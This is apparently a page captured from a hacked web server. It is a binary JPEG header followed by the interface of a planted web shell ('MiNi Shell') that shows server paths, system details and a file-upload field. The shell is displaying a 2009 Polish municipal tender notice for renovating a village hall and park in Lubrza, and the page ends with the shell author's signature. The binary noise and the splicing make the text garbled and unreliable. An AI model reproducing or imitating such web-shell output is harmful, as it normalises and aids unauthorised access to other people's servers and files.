JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091002/168125-N-2009.html

<p class="kh_header"><b>Lubrza: Remont świetlicy wiejskiej wraz zagospodarowaniem parku w miejscowości Nowa Wioska</b><br>
<b>Numer ogłoszenia: 168125 - 2009; data zamieszczenia: 02.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lubrza , ul. Świebodzińska 68, 66-218 Lubrza, woj. lubuskie, tel. 068 3813021, faks 068 3813021.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> lubrza.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont świetlicy wiejskiej wraz zagospodarowaniem parku w miejscowości Nowa Wioska.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest remont świetlicy wiejskiej wraz z zagospodarowaniem parku w miejscowości Nowa Wioska realizowanego w ramach Programu Rozwoju Obszarów Wiejskich na lata 2007 - 2013.


1. Remont pomieszczeń budynku świetlicy wiejskiej, ciąg pieszo - jezdny

Remont pomieszczeń budynku świetlicy wiejskiej, docieplenie elewacji, dobudowa tarasu, przebudowa istniejącej drogi dz. nr. 218.1 oraz wyznaczenie miejsc postojowych dla samochodów osobowych , dojścia do tarasu Świetlicy Wiejskiej usytuowanego w części tylnej budynku, placu zabaw dla dzieci oraz do terenu rekreacyjnego dz. nr.182, małe boisko do kosza, schody żelbetowe zewnętrzne zlokalizowane w niecce terenu wykorzystywanego jako boisko do siatkówki, w szczególności:

- ułożenie płyty OSB i wykładziny w sali widowiskowej świetlicy - 78,0 m2,
- wymiana drzwi wejściowych, przestawienie drzwi na taras,
- wymiana opraw oświetleniowych na sali widowiskowej,
- wykonanie wentylacji wywiewnej i nawiewnej,
- wymiana okien w ścianie szczytowej - 3 szt.
- ocieplenie budynku głównego i wykonanie wyprawy tynkarskiej na budynku z dachem płaskim - ocieplenie 108,0 m2,
- budowa tarasu ze schodami żelbetowymi - 20m2,
- wykonanie ciągów pieszo - jezdnych - 681 m2,
- budowa schodów zewnętrznych przy stawach,

Szczegółowy zakres robót określony został w projekcie budowlanym i przedmiarze robót.
 
2. Oświetlenie parkowe

 -  rozbudowa (modernizacja) istniejącej tablicy rozdzielczo-pomiarowej w budynku świetlicy,
 -  wykonanie oświetlenia zewnętrznego wzdłuż ciągu pieszo - jezdnego za pomocą przewodu kabelkowego typu YKY 4 x 10 mm2 oraz zabudową 7 szt. słupów oświetleniowych parkowych stalowych ocynkowanych typ SW-613.60 z oprawami SGS 101 70 W.

  Szczegółowy zakres robót określony został w projekcie budowlanym i przedmiarze robót.

3. Odbudowa stawów

      - odbudowa dwóch stawów połączonych ze sobą budowlą piętrząco - spustową  tzw.  mnichem - powierzchnia stawu A - 1108,73 m2, powierzchnia stawu B - 655,28 m2,
      -  wykonanie prac makroniwelacyjnych przy stawach,
      -  budowa ścieżki komunikacyjnej wokół ww. stawów - 237,51 mb 
      -  budowa przepustów komunikacyjnych w drodze gminnej,

Szczegółowy zakres robót określony został w projekcie budowlanym i przedmiarze robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.30.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca jest zobowiązany wraz ze złożeniem oferty do wniesienia wadium w wysokości 5.000,0 złotych słownie: pięć tysięcy złotych, zgodnie z art. 45 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych tekst jednolity Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm..
2. Forma wadium:
    1. Wadium może być wniesione w jednej lub kilku następujących formach: 
   a pieniądzu;	
   b poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -   kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
   c gwarancjach bankowych;
   d gwarancjach ubezpieczeniowych;
   e poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2007 r. Nr 42, poz.275.
     2. W przypadku składania przez Wykonawcę wadium w formie gwarancji gwarancja ma być, co najmniej gwarancją nieodwołalną i płatną na pierwsze pisemne żądanie Zamawiającego.
 3.  Miejsce i sposób wniesienia wadium.
    1. Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto PKO BP SA oddział w Świebodzinie, Nr 48 1020 5402 0000 0102 0027 9380 z dopiskiem Wadium -  Remont świetlicy wiejskiej w miejscowości Nowa Wioska.

2.	Wadium wnoszone w innych dopuszczonych przez Zamawiającego formach należy złożyć w oryginale w sekretariacie Zamawiającego (pokój nr 6) a do oferty dołączyć kopię dokumentu posiadającą potwierdzenie złożenia w sekretariacie wadium. 
4.	Termin wniesienia wadium.
1.	Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium za pomocą przelewu bankowego, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. 
2.	Osobą upełnomocnioną do udzielania informacji o potwierdzonych przez bank transakcjach na wymienionym rachunku jest Pani Helena Domagała nr telefonu:
      (68) 38 13 021 wew. 37 lub (068) 38 13 365 od poniedziałku do piątku w  godzinach 9.00 - 14.00.
 5. Zwrot wadium 
     Zamawiający zwraca niezwłocznie wadium jeżeli :
1)	upłynął termin związania ofertą;
2)	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
3)	zamawiający unieważnił postępowanie o udzielenie zamówienia , a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia.
Z zastrzeżeniem art. 46 ust. 4a ustawy PZP zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy :
1)	który wycofał ofertę przed upływem terminu składania ofert;
2)	który został wykluczony z postępowania ;
3)	którego oferta została odrzucona.

Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.

Uwaga: 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca ,którego oferta została wybrana:
    1. odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
         2.  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy ;
    3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. Posiadanie przez oferenta uprawnień do wykonywania działalności lub czynności objętych niniejszym zamówieniem oraz niepodleganie wykluczeniu z postępowania na podstawie art. 24 ust. 1 i ust. 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jednolity Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.)
2. Posiadanie przez oferenta niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia. 

-  wykonanie w okresie ostatnich pięciu lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie następujące roboty budowlane: wykonanie z należytą starannością w ilościach niemniejszych niż:
- ułożenie min. 500 m2 nawierzchni z kostki betonowej,
- wybudowanie lub remont stawów o powierzchni min. 1000 m2,
- wykonanie oświetlenia zewnętrznego z zabudową min. 3 słupów oświetleniowych,
- docieplenie elewacji budynku na powierzchni min. 50 m2,
- posiadanie co najmniej 1  kierownika budowy

3. Znajdowanie się przez wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Wykonawca musi spełniać łącznie następujące warunki:

- posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z wykonaniem niniejszego zamówienia.

4. Udzielenie przez Wykonawcę 36 miesięcznej gwarancji na wykonane prace

5. Wykonanie zamówienia w wymaganym terminie - do dnia 31.05.2010 r..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zawartość oferty.
Oferta złożona w postępowaniu o udzielenie niniejszego zamówienia musi zawierać następujące dokumenty: 
1. Formularz Ofertowy, sporządzony na podstawie wzoru stanowiącego załącznik nr 1
2. Kosztorys ofertowy - załącznik nr 2
3. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - potwierdzające uprawnienia do wykonywania działań lub czynności objętych niniejszym zamówieniem - załącznik nr 3
4. Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - załącznik nr 4
5.  Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - załącznik nr 5
6.  Oświadczenie wykonawcy o spełnianiu przesłanek zawartych w art. 22 ust. 1 pkt 1-4 u.p.z.p., sporządzone na podstawie wzoru stanowiącego załącznik nr 6 
7. Oświadczenie wykonawcy o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ust. 1-2 u.pzp, sporządzone na podstawie wzoru stanowiącego załącznik nr 7,
8. Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy pzp - załącznik nr 8.
9.  Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy pzp.- załącznik nr 9
10. Wykaz wykonanych przez oferenta zamówień podobnych według wzoru stanowiącego załącznik nr 10,
11. Wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia według wzoru stanowiącego załącznik nr 11,
12. Oświadczenie wskazujące części zamówienia, które wykonawca powierzy podwykonawcom według wzoru stanowiącego załącznik nr 12,
13. Oświadczenie, na podstawie art. 8 ust. 3 pzp, o nie ujawnianiu informacji stanowiących tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji według wzoru stanowiącego załącznik nr 13,
14. Zaakceptowany przez oferenta wzór umowy - załącznik nr 14,
15. Dowód wniesienia wadium - załącznik nr 15,
16. Harmonogram rzeczowo - finansowy opracowany przez oferenta - załącznik nr 16
17. W przypadku oferentów wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - załącznik nr 17,
18. W przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru albo zaświadczenia o wpisie do ewidencji działalności gospodarczej - Pełnomocnictwo - załącznik nr 18..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> lubrza.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Lubrzy
ul. Świebodzińska 68
66-218 Lubrza
pok. nr 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2009 godzina 09:30, miejsce: Urząd Gminy w Lubrzy
ul. Świebodzińska 68
66-218 Lubrza
pok. nr 6 - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com